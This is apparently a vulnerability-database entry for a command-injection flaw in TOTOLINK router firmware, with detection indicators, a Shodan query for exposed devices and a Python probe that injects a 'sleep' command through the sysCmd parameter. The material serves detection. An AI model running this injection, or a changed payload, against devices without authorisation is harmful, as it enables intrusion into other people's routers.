CVE-2024-51228
published 2024-11-27


Priority: P2 (75) · CVSS 3.1: 6.8 medium
Vector: AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Tags: ITW · Exploit · VulnCheck KEV
Exploited in the wild
EPSS: 3.79% (88.6th percentile)
An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512 and TOTOLINK-CX-N150RT V2.1.6-B20171121.1002 and TOTOLINK-CX-N300RT V2.1.6-B20170724.1420 and TOTOLINK-CX-N300RT V2.1.8-B20171113.1408 and TOTOLINK-CX-N300RT V2.1.8-B20191010.1107 and TOTOLINK-CX-N302RE V2.0.2-B20170511.1523 allows a remote attacker to execute arbitrary code via the /boafrm/formSysCmd component.

Detection & IOCs (extracted from sources)

  • path: /boafrm/formSysCmd
  • command: sysCmd=sleep%206
  • other: Boa/0.94
  • Send a POST request to /boafrm/formSysCmd with the body parameter sysCmd=sleep%206 and check for a response duration of at least 6 seconds, an HTTP 302 status code, and a Server header containing 'Boa/0.94'. All three conditions must hold to confirm the injection; any one alone (a slow device, a generic 302, a Boa banner) is not evidence.
  • Shodan query 'html:"TOTOLINK"' can be used to identify potentially vulnerable internet-exposed TOTOLINK devices.
  • The detection is time-based: a response that takes at least 6 seconds after a sleep command is injected through the sysCmd parameter indicates OS command injection. Because a congested or slow device can also take several seconds to answer, compare against the latency of an ordinary request to the same host before drawing a conclusion, and make sure the HTTP client's timeout is longer than the injected sleep, or a vulnerable device will look like a dead host.
  • Per the NVD CVSS vector, exploitation requires the attacker to be on the adjacent network (AV:A) and to hold high privileges (PR:H), which would limit remote unauthenticated exploitation. Note that this disagrees with the description ("a remote attacker") and with the detection probe above, which sends no credentials. Do not rely on the PR:H rating to deprioritise exposed devices.
  • Affected firmware versions are specifically: A3002RU V1.0.4-B20171106.1512, N150RT V2.1.6-B20171121.1002, N300RT V2.1.6-B20170724.1420, N300RT V2.1.8-B20171113.1408, N300RT V2.1.8-B20191010.1107, and N302RE V2.0.2-B20170511.1523.
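The three-condition check above, written out as a runnable probe. This is an added example, not code from the page, from TOTOLINK, or from any published detection template; it uses only the Python standard library. The timeout (three times the sleep), the redirect handling and the placeholder target 192.0.2.1 are assumptions, not values from the page. Only run it against devices you are authorised to test.

```python
"""Time-based probe for the TOTOLINK /boafrm/formSysCmd command injection.

Replays the detection logic from the notes above: POST sysCmd=sleep%206 and
require all three of (duration >= 6 s, HTTP 302, Server header containing
"Boa/0.94"). Added example, not vendor or page code.
"""
import sys
import time
import urllib.error
import urllib.request

PATH = "/boafrm/formSysCmd"
PAYLOAD = b"sysCmd=sleep%206"          # form-encoded body from the IOC list
SLEEP_SECONDS = 6.0                    # matches the injected sleep


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """urllib follows 3xx by default; the matcher needs to see the raw 302."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # makes urllib raise HTTPError carrying the 302


def matches(status, server_header, elapsed, threshold=SLEEP_SECONDS):
    """AND of the three conditions; any missing piece yields False."""
    return (
        elapsed >= threshold
        and status == 302
        and server_header is not None
        and "Boa/0.94" in server_header
    )


def probe(base_url, timeout=SLEEP_SECONDS * 3):
    """POST the sleep payload and return (status, server_header, elapsed).

    The timeout must exceed the injected sleep, otherwise a vulnerable device
    is indistinguishable from an unreachable one. 3x the sleep is an
    assumption chosen for this example.
    """
    req = urllib.request.Request(
        base_url.rstrip("/") + PATH,
        data=PAYLOAD,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )
    opener = urllib.request.build_opener(NoRedirect)
    start = time.monotonic()
    try:
        with opener.open(req, timeout=timeout) as resp:
            status, server = resp.status, resp.headers.get("Server")
    except urllib.error.HTTPError as e:
        # With redirects disabled the 302 surfaces here, headers intact.
        status, server = e.code, e.headers.get("Server")
    except OSError:
        # URLError, socket timeout and connection errors all derive from OSError.
        return None, None, time.monotonic() - start
    return status, server, time.monotonic() - start


def check(base_url):
    """Run the probe and report the raw observations plus the verdict."""
    status, server, elapsed = probe(base_url)
    return {
        "status": status,
        "server": server,
        "elapsed": round(elapsed, 2),
        "vulnerable": matches(status, server, elapsed),
    }


if __name__ == "__main__":
    # 192.0.2.1 is a documentation-only address used here as a placeholder.
    target = sys.argv[1] if len(sys.argv) > 1 else "http://192.0.2.1"
    print(check(target))
```

The verdict is deliberately computed by `matches()` from the three observed values rather than inside the request code, so the same logic can be applied to proxy logs or to a baseline measurement of the host's normal latency before the probe is trusted.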

CVSS provenance

  • NVD (CVSS v3.1): 6.8 MEDIUM, CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • VulnCheck: 6.8 MEDIUM